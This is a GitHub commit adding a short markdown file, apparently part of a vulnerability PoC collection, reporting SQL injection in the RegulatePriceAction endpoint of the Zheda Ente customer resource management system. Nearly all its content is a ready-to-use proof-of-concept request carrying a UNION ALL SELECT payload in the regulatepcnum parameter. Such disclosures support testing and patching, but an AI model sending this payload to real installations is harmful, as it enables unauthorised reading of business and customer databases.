Create 浙大恩特客户资源管理系统-RegulatePriceAction存在SQL注入.md

This commit is contained in:
wy876 2024-04-07 18:31:01 +08:00 committed by GitHub
parent a24fa95300
commit f31be51fa5
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194

View File

@ -0,0 +1,7 @@
## 浙大恩特客户资源管理系统-RegulatePriceAction存在SQL注入
## poc
```
/entsoft/RegulatePriceAction.entsoft;.js?method=getRegulatePricedlist&regulatepcnum=1'+UNION+ALL+SELECT+NULL,NULL,NULL,NULL,NULL,NULL,NULL,111*111--+aaaa
```